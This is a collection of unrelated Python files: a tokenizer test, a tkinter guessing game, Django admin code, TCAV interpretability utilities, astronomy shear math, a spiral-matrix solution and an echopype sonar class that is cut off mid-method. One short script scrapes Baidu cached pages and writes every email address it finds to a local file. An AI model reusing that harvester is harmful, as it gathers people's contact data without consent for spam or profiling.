temp directory. You can change that\nat any time by calling set_output_directory().\n\nClass static member:\n ANALYTIC_NAME : Name of the analytic\n\nClass members:\n directory : Directory the output will go to\n is_static : True means this analytic doesn\'t require a file to run\n logger : Logging object for errors, warnings, and messages\n plug_namer : Object creating plug names, possibly anonymous\n node_namer : Object creating node names, possibly anonymous\n csv_output : Location to store legacy CSV output\n plug_namer : Set by option \'anonymous\' - if True then make plug names anonymous\n node_namer : Set by option \'anonymous\' - if True then make node names anonymous\n __options : Dictionary of per-analytic options\n\n\tMethods\n\t-------\n\tdebug : Utility to standardize debug messages coming from analytics.\n\n\terror : Utility to standardize errors coming from analytics.\n\n\testablish_baseline : This is run on an empty scene, to give the analytic a chance to\n\t establish any baseline data it might need (e.g. the nodes in an\n\t empty scene could all be ignored by the analytic)\n\t \n\t Base implementation does nothing. Derived classes should call\n\t their super() method though, in case something does get added.\n\n\thelp : Call this method to print the class documentation, including all methods.\n\n\tjson_file : Although an analytic is free to create any set of output files it\n\t wishes there will always be one master JSON file containing the\n\n\tlog : Utility to standardize logging messages coming from analytics.\n\n\tmarker_file : Returns the name of the marker file used to indicate that the\n\t computation of an analytic is in progress. If this file remains\n\t in a directory after the analytic has run that means it was\n\t interrupted and the data is not up to date.\n\t \n\t This file provides a safety measure against machines going down\n\t or analytics crashing.\n\n\tname : Get the name of this type of analytic\n\n\toption : Return TRUE if the option specified has been set on this analytic.\n\t option: Name of option to check\n\n\toutput_files : This is used to get the list of files the analytic will generate.\n\t There will always be a JSON file generated which contains at minimum\n\t the timing information. An analytic should override this method only\n\t if they are adding more output files (e.g. a .jpg file).\n\t \n\t This should only be called after the final directory has been set.\n\n\trun : Run the analytic on the current scene.\n\t :return: JSON results as described in the class doc\n\n\tset_options : Modify the settings controlling the run operation of the analytic.\n\t Override this method if your analytic has some different options\n\t available to it, but be sure to call this parent version after since\n\t it sets common options.\n\n\tset_output_directory : Call this method to set a specific directory as the output location.\n\t The special names \'stdout\' and \'stderr\' are recognized as the\n\t output and error streams respectively rather than a directory.\n\n\twarning : Utility to standardize warnings coming from analytics.\n'
is_static = False
kAnalyticLabel = []
kAnalyticDescriptionShort = []
MODE_LIST = []
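# A minimal usage sketch (hypothetical; the stub bodies above are empty, so the
# real behavior comes from Maya's analytics runtime):
#
#   analytic = analyticTiming()
#   analytic.set_output_directory('stdout')
#   results = analytic.run()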
|
import pytest
@pytest.mark.parametrize(
"text,expected_tokens", [("d'un", ["d'", "un"]), ("s'ha", ["s'", "ha"])]
)
def test_contractions(ca_tokenizer, text, expected_tokens):
"""Test that the contractions are split into two tokens"""
tokens = ca_tokenizer(text)
assert len(tokens) == 2
assert [t.text for t in tokens] == expected_tokens
|
# import modules
import tkinter as t
from random import randrange
tk = t.Tk()
tk.title("Guessing Game")
tk.iconbitmap("logo-ico.ico")
lblInst = t.Label(tk, text = "Guess a number from 0 to 9")
lblLine0 = t.Label(tk, text = "*********************************************************************")
lblNoGuess = t.Label(tk, text = "Number of Guesses: 0")
lblMaxGuess = t.Label(tk, text = "Max Guess: 3")
lblLine1 = t.Label(tk, text = "*********************************************************************")
lblLogsHeader = t.Label(tk, text="Game Logs")
lblLine2 = t.Label(tk, text = "*********************************************************************")
# Create the buttons
buttons = []
for index in range(0, 10):
button = t.Button(tk, text=index, command=lambda index=index : process(index),
state=t.DISABLED, bg='#99ffbb', fg='#1a001a')
buttons.append(button)
btnStartGameList = []
for index in range(0, 1):
btnStartGame = t.Button(tk, text="Start Game", command=lambda : startgame(index), bg='#66ffff')
btnStartGameList.append(btnStartGame)
# Append elements to grid
lblInst.grid(row=0, column=0, columnspan=5)
lblLine0.grid(row=1, column=0, columnspan=5)
lblNoGuess.grid(row=2, column=0, columnspan=3)
lblMaxGuess.grid(row=2, column=3, columnspan=2)
lblLine1.grid(row=3, column=0, columnspan=5)
lblLogsHeader.grid(row=4, column=0, columnspan=5) # rows 4 - 8 are reserved for showing logs
lblLine2.grid(row=9, column=0, columnspan=5)
for row in range(0, 2):
for col in range(0, 5):
i = row * 5 + col # convert 2d index to 1d. 5= total number of columns
buttons[i].grid(row=row+10, column=col)
btnStartGameList[0].grid(row=13, column=0, columnspan=5)
# Main game logic
guess = 0
totalNumberOfGuesses = 0
secretNumber = randrange(10)
print(secretNumber)
lblLogs = []  # Label widgets holding the per-guess log lines
guess_row = 4
# Functions
# Reset all variables
def init():
global buttons, guess, totalNumberOfGuesses, secretNumber, lblNoGuess, lblLogs, guess_row
guess = 0
totalNumberOfGuesses = 0
secretNumber = randrange(10)
print(secretNumber)
lblNoGuess["text"] = "Number of Guesses: 0"
guess_row = 4
# remove all logs on init
for lblLog in lblLogs:
lblLog.grid_forget()
lblLogs = []
def process(i):
global totalNumberOfGuesses, buttons, guess_row
guess = i
totalNumberOfGuesses += 1
lblNoGuess["text"] = "Number of Guesses: " + str(totalNumberOfGuesses)
# check if guess match secret number
if guess == secretNumber:
lbl = t.Label(tk, text="Your guess was right. You won! :) ", fg="green")
lbl.grid(row=guess_row, column=0, columnspan=5)
lblLogs.append(lbl)
guess_row += 1
for b in buttons:
b["state"] = t.DISABLED
else:
# give player some hints
if guess > secretNumber:
lbl = t.Label(tk, text="Secret number is less than your current guess :)", fg="red")
lbl.grid(row=guess_row, column=0, columnspan=5)
lblLogs.append(lbl)
guess_row += 1
else:
lbl = t.Label(tk, text="Secret number is greater than your current guess :)", fg="red")
lbl.grid(row=guess_row, column=0, columnspan=5)
lblLogs.append(lbl)
guess_row += 1
# game is over when max no of guesses is reached
if totalNumberOfGuesses == 3:
if guess != secretNumber:
lbl = t.Label(tk, text="Max guesses reached. You lost! :)", fg="red")
lbl.grid(row=guess_row, column=0, columnspan=5)
lblLogs.append(lbl)
guess_row += 1
for b in buttons:
b["state"] = t.DISABLED
buttons[i]["state"] = t.DISABLED
status = "none"
def startgame(i):
global status
for b in buttons:
b["state"] = t.NORMAL
if status == "none":
status = "started"
btnStartGameList[i]["text"] = "Restart Game"
else:
status = "restarted"
init()
print("Game started")
tk.mainloop()
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth import get_user_model
from .forms import UserChangeForm
from .forms import UserCreationForm
from .models import IllumiDeskUser
User = get_user_model()
@admin.register(IllumiDeskUser)
class IllumiDeskUserAdmin(UserAdmin):
form = UserChangeForm
add_form = UserCreationForm
fieldsets = UserAdmin.fieldsets + (
('Custom Fields', {
'fields': ('customer', 'subscription')
}),
)
list_display = ['customer', 'subscription', 'is_superuser',]
search_fields = ['customer']
|
"""
Copyright 2018 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from scipy.stats import ttest_ind
import numpy as np
import tensorflow as tf
from tcav.tcav_results.results_pb2 import Result, Results
_KEYS = [
"cav_key", "cav_concept", "negative_concept", "target_class", "i_up",
"val_directional_dirs_abs_mean", "val_directional_dirs_mean",
"val_directional_dirs_std", "note", "alpha", "bottleneck"
]
def create_session(timeout=10000, interactive=True):
"""Create a tf session for the model.
  # This function is a slight modification of code written by Alex Mordvintsev
  Args:
    timeout: tfutil param.
    interactive: if True, return an InteractiveSession instead of a regular Session.
  Returns:
TF session.
"""
graph = tf.Graph()
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True
config.operation_timeout_in_ms = int(timeout*1000)
if interactive:
return tf.compat.v1.InteractiveSession(graph=graph, config=config)
else:
return tf.compat.v1.Session(graph=graph, config=config)
def flatten(nested_list):
"""Flatten a nested list."""
return [item for a_list in nested_list for item in a_list]
def process_what_to_run_expand(pairs_to_test,
random_counterpart=None,
num_random_exp=100,
random_concepts=None):
"""Get concept vs. random or random vs. random pairs to run.
Given set of target, list of concept pairs, expand them to include
random pairs. For instance [(t1, [c1, c2])...] becomes
[(t1, [c1, random1],
(t1, [c1, random2],...
(t1, [c2, random1],
(t1, [c2, random2],...]
Args:
pairs_to_test: [(target1, concept1), (target1, concept2), ...,
(target2, concept1), (target2, concept2), ...]
random_counterpart: random concept that will be compared to the concept.
num_random_exp: number of random experiments to run against each concept.
random_concepts: A list of names of random concepts for the random
experiments to draw from. Optional, if not provided, the
names will be random500_{i} for i in num_random_exp.
Returns:
all_concepts: unique set of targets/concepts
new_pairs_to_test: expanded
"""
def get_random_concept(i):
return (random_concepts[i] if random_concepts
else 'random500_{}'.format(i))
new_pairs_to_test = []
for (target, concept_set) in pairs_to_test:
new_pairs_to_test_t = []
# if only one element was given, this is to test with random.
if len(concept_set) == 1:
i = 0
while len(new_pairs_to_test_t) < min(100, num_random_exp):
# make sure that we are not comparing the same thing to each other.
if concept_set[0] != get_random_concept(
i) and random_counterpart != get_random_concept(i):
new_pairs_to_test_t.append(
(target, [concept_set[0], get_random_concept(i)]))
i += 1
elif len(concept_set) > 1:
new_pairs_to_test_t.append((target, concept_set))
else:
      tf.compat.v1.logging.info('PAIR NOT PROCESSED')
new_pairs_to_test.extend(new_pairs_to_test_t)
all_concepts = list(set(flatten([cs + [tc] for tc, cs in new_pairs_to_test])))
return all_concepts, new_pairs_to_test
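# Illustrative expansion (hypothetical names; the ordering of all_concepts is
# not deterministic because it passes through a set):
#
#   process_what_to_run_expand([("zebra", ["striped"])], num_random_exp=2)
#   # new_pairs_to_test == [("zebra", ["striped", "random500_0"]),
#   #                       ("zebra", ["striped", "random500_1"])]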
def process_what_to_run_concepts(pairs_to_test):
"""Process concepts and pairs to test.
Args:
pairs_to_test: a list of concepts to be tested and a target (e.g,
[ ("target1", ["concept1", "concept2", "concept3"]),...])
Returns:
return pairs to test:
target1, concept1
target1, concept2
...
target2, concept1
target2, concept2
...
"""
pairs_for_sstesting = []
  # prepare pairs for concept vs. random.
for pair in pairs_to_test:
for concept in pair[1]:
pairs_for_sstesting.append([pair[0], [concept]])
return pairs_for_sstesting
def process_what_to_run_randoms(pairs_to_test, random_counterpart):
"""Process concepts and pairs to test.
Args:
pairs_to_test: a list of concepts to be tested and a target (e.g,
[ ("target1", ["concept1", "concept2", "concept3"]),...])
random_counterpart: a random concept that will be compared to the concept.
Returns:
return pairs to test:
target1, random_counterpart,
target2, random_counterpart,
...
"""
# prepare pairs for random vs random.
pairs_for_sstesting_random = []
targets = list(set([pair[0] for pair in pairs_to_test]))
for target in targets:
pairs_for_sstesting_random.append([target, [random_counterpart]])
return pairs_for_sstesting_random
# helper functions to write summary files
def print_results(results, random_counterpart=None, random_concepts=None, num_random_exp=100,
min_p_val=0.05):
"""Helper function to organize results.
If you ran TCAV with a random_counterpart, supply it here, otherwise supply random_concepts.
If you get unexpected output, make sure you are using the correct keywords.
Args:
results: dictionary of results from TCAV runs.
random_counterpart: name of the random_counterpart used, if it was used.
random_concepts: list of random experiments that were run.
num_random_exp: number of random experiments that were run.
min_p_val: minimum p value for statistical significance
"""
# helper function, returns if this is a random concept
def is_random_concept(concept):
if random_counterpart:
return random_counterpart == concept
elif random_concepts:
return concept in random_concepts
else:
return 'random500_' in concept
# print class, it will be the same for all
print("Class =", results[0]['target_class'])
# prepare data
# dict with keys of concepts containing dict with bottlenecks
result_summary = {}
# random
random_i_ups = {}
for result in results:
if result['cav_concept'] not in result_summary:
result_summary[result['cav_concept']] = {}
if result['bottleneck'] not in result_summary[result['cav_concept']]:
result_summary[result['cav_concept']][result['bottleneck']] = []
result_summary[result['cav_concept']][result['bottleneck']].append(result)
# store random
if is_random_concept(result['cav_concept']):
if result['bottleneck'] not in random_i_ups:
random_i_ups[result['bottleneck']] = []
random_i_ups[result['bottleneck']].append(result['i_up'])
# print concepts and classes with indentation
for concept in result_summary:
# if not random
if not is_random_concept(concept):
print(" ", "Concept =", concept)
for bottleneck in result_summary[concept]:
i_ups = [item['i_up'] for item in result_summary[concept][bottleneck]]
# Calculate statistical significance
_, p_val = ttest_ind(random_i_ups[bottleneck], i_ups)
print(3 * " ", "Bottleneck =", ("%s. TCAV Score = %.2f (+- %.2f), "
"random was %.2f (+- %.2f). p-val = %.3f (%s)") % (
bottleneck, np.mean(i_ups), np.std(i_ups),
np.mean(random_i_ups[bottleneck]),
np.std(random_i_ups[bottleneck]), p_val,
"undefined" if np.isnan(p_val) else "not significant" if p_val > min_p_val else "significant"))
def make_dir_if_not_exists(directory):
if not tf.io.gfile.exists(directory):
tf.io.gfile.makedirs(directory)
def result_to_proto(result):
"""Given a result dict, convert it to a tcav.Result proto.
Args:
result: a dictionary returned by tcav._run_single_set()
Returns:
TCAV.Result proto
"""
result_proto = Result()
for key in _KEYS:
setattr(result_proto, key, result[key])
positive_set_name = result["cav_concept"]
negative_set_name = result["negative_concept"]
for val in result["val_directional_dirs"]:
result_proto.val_directional_dirs.append(val)
result_proto.cav_accuracies.positive_set_accuracy = result["cav_accuracies"][
positive_set_name]
result_proto.cav_accuracies.negative_set_accuracy = result["cav_accuracies"][
negative_set_name]
result_proto.cav_accuracies.overall_accuracy = result["cav_accuracies"][
"overall"]
return result_proto
def results_to_proto(results):
"""Given a list of result dicts, convert it to a tcav.Results proto.
Args:
results: a list of dictionaries returned by tcav.run()
Returns:
TCAV.Results proto
"""
results_proto = Results()
for result in results:
results_proto.results.append(result_to_proto(result))
return results_proto
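# Hedged serialization sketch (not from the original file; assumes only the
# standard protobuf API on the Results message above):
#
#   proto = results_to_proto(results)
#   with tf.io.gfile.GFile('tcav_results.pb', 'wb') as f:
#       f.write(proto.SerializeToString())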
|
import requests
import re
import numpy as np
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'
}
url = 'https://www.baidu.com/s?wd=%E7%95%99%E4%B8%8B%E9%82%AE%E7%AE%B1'
response = requests.get(url,headers=headers)
html = response.text
regex = re.compile("[a-zA-z]+://[^\s]*")
res = regex.findall(html)
new_res = []
for i in res:
if '//cache.baiducontent.com/c?m=9' in i:
new_res.append(i)
for j in new_res:
response = requests.get(j,headers=headers)
html_1 = response.text
regex = re.compile("[\w!#$%&'*+/=?^_`{|}~-]+(?:\.[\w!#$%&'*+/=?^_`{|}~-]+)*@(?:[\w](?:[\w-]*[\w])?\.)+[\w](?:[\w-]*[\w])?")
res_1 = regex.findall(html_1)
list_2 = str(list(set(res_1)))
with open('C:\\Users\\lenovo\\Desktop\\html\\emile.txt',mode='a',encoding='utf8') as f:
f.write(list_2)
|
import numpy as np
def shear_matrix(night, expid, mjd, data):
"""
Computes the second moment matrix
"""
profiles = data['GUIDE']
shear_data = dict()
for camera in profiles:
Q = np.zeros((2, 2))
profile = profiles[camera]['model']
center = profile.shape[0] / 2
y, x = np.indices((profile.shape))
rx = (x - center) ** 2
ry = (y - center) ** 2
rxy = (x - center) * (y - center)
denom = np.sum(profile)
Q[0, 0] = np.sum(rx.ravel() * profile.ravel()) / denom
Q[1, 1] = np.sum(ry.ravel() * profile.ravel()) / denom
Q[0, 1] = np.sum(rxy.ravel() * profile.ravel()) / denom
Q[1, 0] = Q[0, 1]
a2, b2 = compute_a2b2(Q)
beta = compute_beta(Q, a2, b2)
s, e1, e2 = get_se1e2(Q)
a, b = np.sqrt(a2), np.sqrt(b2)
g = (a - b) / (a + b)
g1, g2 = compute_reduced(g, beta)
shear_data[camera] = {
"night": night, "expid": expid, "mjd": mjd,
"Q": Q, "a": a, "b": b, "beta": beta,
"s": s, "e1": e1, "e2": e2, "g1": g1, "g2": g2
}
return shear_data
def get_se1e2(Q):
"""
Given the second moment matrix, compute s, e1, and e2
"""
Q11 = Q[0, 0]
Q22 = Q[1, 1]
Q12 = Q[0, 1]
e1 = (Q11 - Q22) / (Q11 + Q22 + 2 * np.sqrt(Q11 * Q22 - Q12 ** 2))
e2 = 2 * Q12 / (Q11 + Q22 + 2 * np.sqrt(Q11 * Q22 - Q12 ** 2))
s = np.linalg.det(Q) ** (1/4)
return s, e1, e2
def compute_a2b2(Q):
"""
Given the second moment matrix, compute a^2 and b^2
"""
Q11 = Q[0, 0]
Q22 = Q[1, 1]
Q12 = Q[0, 1]
a2t = 0.5 * (Q11 + Q22 + np.sqrt((Q11 - Q22) ** 2 + 4 * Q12 ** 2))
b2t = 0.5 * (Q11 + Q22 - np.sqrt((Q11 - Q22) ** 2 + 4 * Q12 ** 2))
a2, b2 = max(a2t, b2t), min(a2t, b2t)
assert a2 >= b2
return a2, b2
def compute_beta(Q, a2, b2):
"""
Given the second moment matrix, a^2, and b^2
compute the angle between the axis with length a
and e_1
"""
Q12 = Q[0, 1]
beta = 0.5 * np.arcsin(2 * Q12 / (a2 - b2))
return beta
def compute_reduced(g, beta):
"""
Compute reduced shear components
"""
g1 = g * np.cos(2. * beta)
g2 = g * np.sin(2. * beta)
return g1, g2
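if __name__ == "__main__":
    # Hedged sanity check (not part of the original module): a slightly
    # elliptical Gaussian aligned with the x axis should give a > b, e1 > 0
    # and e2 ~ 0. The night/expid/mjd values and the camera key "GUIDE0"
    # are placeholders.
    n = 64
    yy, xx = np.indices((n, n))
    c = n / 2
    profile = np.exp(-((xx - c) ** 2 / (2 * 6.0 ** 2) + (yy - c) ** 2 / (2 * 4.0 ** 2)))
    data = {"GUIDE": {"GUIDE0": {"model": profile}}}
    out = shear_matrix("20210101", 1, 59215.0, data)["GUIDE0"]
    print("a=%.3f b=%.3f e1=%.4f e2=%.4f" % (out["a"], out["b"], out["e1"], out["e2"]))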
|
class Solution:
def spiral(self, matrix, direction):
if not matrix or not matrix[0]:
return []
direction += 1
if direction % 4 == 0: # right
return matrix[0] + self.spiral(matrix[1:], direction)
elif direction % 4 == 1: # down
new = [i[-1] for i in matrix]
matrix = [i[:len(i)-1] for i in matrix]
return new + self.spiral(matrix, direction)
elif direction % 4 == 2: # left
return matrix[-1][::-1] + self.spiral(matrix[:len(matrix)-1], direction)
elif direction % 4 == 3: # up
new = [i[0] for i in matrix][::-1]
matrix = [i[1:] for i in matrix]
return new + self.spiral(matrix, direction)
# @param matrix, a list of lists of integers
# @return a list of integer
def spiralOrder(self, matrix):
        return self.spiral(matrix, -1)
s = Solution()
# test inputs; each assignment below overrides the previous one
m = [[7],[9],[6]]
m = []
m = [
[ 1, 2, 3 ],
[ 4, 5, 6 ],
[ 7, 8, 9 ]
]
m = [
[1,2,3,4],
[5,6,7,8],
[9,10,11,12],
[13,14,15,16]
]
print(s.spiralOrder(m))
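# Expected output for the 4x4 matrix above (traced by hand, clockwise spiral):
# [1, 2, 3, 4, 8, 12, 16, 15, 14, 13, 9, 5, 6, 7, 11, 10]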
|
"""
echopype data model that keeps tracks of echo data and
its connection to data files.
"""
import os
import warnings
import datetime as dt
from echopype.utils import uwa
import numpy as np
import xarray as xr
class ModelBase(object):
"""Class for manipulating echo data that is already converted to netCDF."""
def __init__(self, file_path=""):
self.file_path = file_path # this passes the input through file name test
self.noise_est_range_bin_size = 5 # meters per tile for noise estimation
self.noise_est_ping_size = 30 # number of pings per tile for noise estimation
self.MVBS_range_bin_size = 5 # meters per tile for MVBS
self.MVBS_ping_size = 30 # number of pings per tile for MVBS
self.Sv = None # calibrated volume backscattering strength
self.Sv_path = None # path to save calibrated results
self.Sv_clean = None # denoised volume backscattering strength
self.TS = None # calibrated target strength
self.TS_path = None # path to save TS calculation results
self.MVBS = None # mean volume backscattering strength
self._salinity = None
self._temperature = None
self._pressure = None
self._sound_speed = None
self._sample_thickness = None
self._range = None
self._seawater_absorption = None
@property
def salinity(self):
return self._salinity
@salinity.setter
def salinity(self, sal):
self._salinity = sal
@property
def pressure(self):
return self._pressure
@pressure.setter
def pressure(self, pres):
self._pressure = pres
@property
def temperature(self):
return self._temperature
@temperature.setter
def temperature(self, t):
self._temperature = t
@property
def sample_thickness(self):
return self._sample_thickness
@sample_thickness.setter
def sample_thickness(self, sth):
self._sample_thickness = sth
@property
def range(self):
return self._range
@range.setter
def range(self, rr):
self._range = rr
@property
def seawater_absorption(self):
return self._seawater_absorption
@seawater_absorption.setter
def seawater_absorption(self, absorption):
self._seawater_absorption.values = absorption
@property
def sound_speed(self):
return self._sound_speed
@sound_speed.setter
def sound_speed(self, ss):
if isinstance(self._sound_speed, xr.DataArray):
self._sound_speed.values = ss
else:
self._sound_speed = ss
@property
def file_path(self):
return self._file_path
@file_path.setter
def file_path(self, p):
self._file_path = p
# Load netCDF groups if file format is correct
pp = os.path.basename(p)
_, ext = os.path.splitext(pp)
supported_ext_list = ['.raw', '.01A']
if ext in supported_ext_list:
print('Data file in manufacturer format, please convert to .nc first.')
elif ext == '.nc':
self.toplevel = xr.open_dataset(self.file_path)
# Get .nc filenames for storing processed data if computation is performed
self.Sv_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_Sv.nc')
self.Sv_clean_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_Sv_clean.nc')
self.TS_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_TS.nc')
self.MVBS_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_MVBS.nc')
# Raise error if the file format convention does not match
if self.toplevel.sonar_convention_name != 'SONAR-netCDF4':
raise ValueError('netCDF file convention not recognized.')
self.toplevel.close()
else:
raise ValueError('Data file format not recognized.')
def calc_sound_speed(self, src='file'):
"""Base method to be overridden for calculating sound_speed for different sonar models
"""
# issue warning when subclass methods not available
print("Sound speed calculation has not been implemented for this sonar model!")
def calc_seawater_absorption(self, src='file'):
"""Base method to be overridden for calculating seawater_absorption for different sonar models
"""
# issue warning when subclass methods not available
print("Seawater absorption calculation has not been implemented for this sonar model!")
def calc_sample_thickness(self):
"""Base method to be overridden for calculating sample_thickness for different sonar models.
"""
# issue warning when subclass methods not available
print('Sample thickness calculation has not been implemented for this sonar model!')
def calc_range(self):
"""Base method to be overridden for calculating range for different sonar models.
"""
# issue warning when subclass methods not available
print('Range calculation has not been implemented for this sonar model!')
def recalculate_environment(self, ss=True, sa=True, st=True, r=True):
""" Recalculates sound speed, seawater absorption, sample thickness, and range using
salinity, temperature, and pressure
Parameters
----------
        ss : bool
            Whether to calculate sound speed. Defaults to `True`
        sa : bool
            Whether to calculate seawater absorption. Defaults to `True`
        st : bool
            Whether to calculate sample thickness. Defaults to `True`
        r : bool
            Whether to calculate range. Defaults to `True`
"""
s, t, p = self.salinity, self.temperature, self.pressure
if s is not None and t is not None and p is not None:
if ss:
self.sound_speed = self.calc_sound_speed(src='user')
if sa:
self.seawater_absorption = self.calc_seawater_absorption(src='user')
if st:
self.sample_thickness = self.calc_sample_thickness()
if r:
self.range = self.calc_range()
elif s is None:
print("Salinity was not provided. Environment was not recalculated")
elif t is None:
print("Temperature was not provided. Environment was not recalculated")
else:
print("Pressure was not provided. Environment was not recalculated")
def calibrate(self):
"""Base method to be overridden for volume backscatter calibration and echo-integration for different sonar models.
"""
# issue warning when subclass methods not available
print('Calibration has not been implemented for this sonar model!')
def calibrate_TS(self):
"""Base method to be overridden for target strength calibration and echo-integration for different sonar models.
"""
# issue warning when subclass methods not available
print('Target strength calibration has not been implemented for this sonar model!')
def validate_path(self, save_path, save_postfix):
"""Creates a directory if it doesnt exist. Returns a valid save path.
"""
def _assemble_path():
file_in = os.path.basename(self.file_path)
file_name, file_ext = os.path.splitext(file_in)
return file_name + save_postfix + file_ext
if save_path is None:
save_dir = os.path.dirname(self.file_path)
file_out = _assemble_path()
else:
path_ext = os.path.splitext(save_path)[1]
# If given save_path is file, split into directory and file
if path_ext != '':
save_dir, file_out = os.path.split(save_path)
if save_dir == '': # save_path is only a filename without directory
save_dir = os.path.dirname(self.file_path) # use directory from input file
# If given save_path is a directory, get a filename from input .nc file
else:
save_dir = save_path
file_out = _assemble_path()
# Create folder if not already exists
if save_dir == '':
# TODO: should we use '.' instead of os.getcwd()?
save_dir = os.getcwd() # explicit about path to current directory
if not os.path.exists(save_dir):
os.mkdir(save_dir)
return os.path.join(save_dir, file_out)
@staticmethod
def get_tile_params(r_data_sz, p_data_sz, r_tile_sz, p_tile_sz, sample_thickness):
"""Obtain ping_time and range_bin parameters associated with groupby and groupby_bins operations.
These parameters are used in methods remove_noise(), noise_estimates(), get_MVBS().
Parameters
----------
r_data_sz : int
number of range_bin entries in data
p_data_sz : int
number of ping_time entries in data
r_tile_sz : float
tile size along the range_bin dimension [m]
p_tile_sz : int
tile size along the ping_time dimension [number of pings]
sample_thickness : float
thickness of each data sample, determined by sound speed and pulse duration
Returns
-------
r_tile_sz : int
modified tile size along the range dimension [m], determined by sample_thickness
r_tile_bin_edge : list of int
bin edges along the range_bin dimension for :py:func:`xarray.DataArray.groupby_bins` operation
p_tile_bin_edge : list of int
bin edges along the ping_time dimension for :py:func:`xarray.DataArray.groupby_bins` operation
"""
# Adjust noise_est_range_bin_size because range_bin_size may be an inconvenient value
num_r_per_tile = np.round(r_tile_sz / sample_thickness).astype(int) # num of range_bin per tile
r_tile_sz = num_r_per_tile * sample_thickness
# Total number of range_bin and ping tiles
num_tile_range_bin = np.ceil(r_data_sz / num_r_per_tile).astype(int)
if np.mod(p_data_sz, p_tile_sz) == 0:
num_tile_ping = np.ceil(p_data_sz / p_tile_sz).astype(int) + 1
else:
num_tile_ping = np.ceil(p_data_sz / p_tile_sz).astype(int)
# Tile bin edges along range
# ... -1 to make sure each bin has the same size because of the right-inclusive and left-exclusive bins
r_tile_bin_edge = [np.arange(x.values + 1) * y.values - 1 for x, y in zip(num_tile_range_bin, num_r_per_tile)]
p_tile_bin_edge = np.arange(num_tile_ping + 1) * p_tile_sz - 1
return r_tile_sz, r_tile_bin_edge, p_tile_bin_edge
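    # Worked example for get_tile_params (hedged, using a scalar
    # sample_thickness for simplicity): with r_data_sz=1000,
    # sample_thickness=0.2 m and r_tile_sz=5 m, each tile spans
    # round(5 / 0.2) = 25 range_bin samples, so the adjusted r_tile_sz is
    # 25 * 0.2 = 5 m and there are ceil(1000 / 25) = 40 range tiles.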
def _get_proc_Sv(self, source_path=None, source_postfix='_Sv'):
"""Private method to return calibrated Sv either from memory or _Sv.nc file.
This method is called by remove_noise(), noise_estimates() and get_MVBS().
"""
if self.Sv is None: # calibration not yet performed
Sv_path = self.validate_path(save_path=source_path, # wrangle _Sv path
save_postfix=source_postfix)
if os.path.exists(Sv_path): # _Sv exists
self.Sv = xr.open_dataset(Sv_path) # load _Sv file
else:
                # if a path was specified but the file does not exist:
if (source_path is not None) or (source_postfix != '_Sv'):
print('%s no calibrated data found in specified path: %s' %
(dt.datetime.now().strftime('%H:%M:%S'), Sv_path))
else:
print('%s data has not been calibrated. ' % dt.datetime.now().strftime('%H:%M:%S'))
print(' performing calibration now and operate from Sv in memory.')
self.calibrate() # calibrate, have Sv in memory
return self.Sv
def remove_noise(self, source_postfix='_Sv', source_path=None,
noise_est_range_bin_size=None, noise_est_ping_size=None,
SNR=0, Sv_threshold=None,
save=False, save_postfix='_Sv_clean', save_path=None):
"""Remove noise by using noise estimates obtained from the minimum mean calibrated power level
along each column of tiles.
See method noise_estimates() for details of noise estimation.
Reference: De Robertis & Higginbottom, 2017, ICES Journal of Marine Sciences
Parameters
----------
source_postfix : str
postfix of the Sv file used to remove noise from, default to '_Sv'
source_path : str
path of Sv file used to remove noise from, can be one of the following:
- None (default):
use Sv in RAWFILENAME_Sv.nc in the same folder as the raw data file,
                or when RAWFILENAME_Sv.nc doesn't exist, perform self.calibrate() and use the resulting self.Sv
- path to a directory: RAWFILENAME_Sv.nc in the specified directory
- path to a specific file: the specified file, e.g., ./another_directory/some_other_filename.nc
noise_est_range_bin_size : float, optional
Meters per tile for noise estimation [m]
noise_est_ping_size : int, optional
Number of pings per tile for noise estimation
SNR : int, optional
Minimum signal-to-noise ratio (remove values below this after general noise removal).
Sv_threshold : int, optional
Minimum Sv threshold [dB] (remove values below this after general noise removal)
save : bool, optional
Whether to save the denoised Sv (``Sv_clean``) into a new .nc file.
Default to ``False``.
save_postfix : str
Filename postfix, default to '_Sv_clean'
save_path : str
Full filename to save to, overwriting the RAWFILENAME_Sv_clean.nc default
"""
# Check params
if (noise_est_range_bin_size is not None) and (self.noise_est_range_bin_size != noise_est_range_bin_size):
self.noise_est_range_bin_size = noise_est_range_bin_size
if (noise_est_ping_size is not None) and (self.noise_est_ping_size != noise_est_ping_size):
self.noise_est_ping_size = noise_est_ping_size
# Get calibrated Sv
if self.Sv is not None:
print('%s Remove noise from Sv stored in memory.' % dt.datetime.now().strftime('%H:%M:%S'))
print_src = False
else:
print_src = True
proc_data = self._get_proc_Sv(source_path=source_path, source_postfix=source_postfix)
if print_src:
print('%s Remove noise from Sv stored in: %s' %
(dt.datetime.now().strftime('%H:%M:%S'), self.Sv_path))
# Get tile indexing parameters
self.noise_est_range_bin_size, range_bin_tile_bin_edge, ping_tile_bin_edge = \
self.get_tile_params(r_data_sz=proc_data.range_bin.size,
p_data_sz=proc_data.ping_time.size,
r_tile_sz=self.noise_est_range_bin_size,
p_tile_sz=self.noise_est_ping_size,
sample_thickness=self.sample_thickness)
# Get TVG and ABS for compensating for transmission loss
range_meter = self.range
TVG = np.real(20 * np.log10(range_meter.where(range_meter >= 1, other=1)))
ABS = 2 * self.seawater_absorption * range_meter
# Function for use with apply
def remove_n(x, rr):
p_c_lin = 10 ** ((x.Sv - x.ABS - x.TVG) / 10)
nn = 10 * np.log10(p_c_lin.mean(dim='ping_time').groupby_bins('range_bin', rr).mean().min(
dim='range_bin_bins')) + x.ABS + x.TVG
            # Return values where signal is [SNR] dB above noise and at least [Sv_threshold] dB
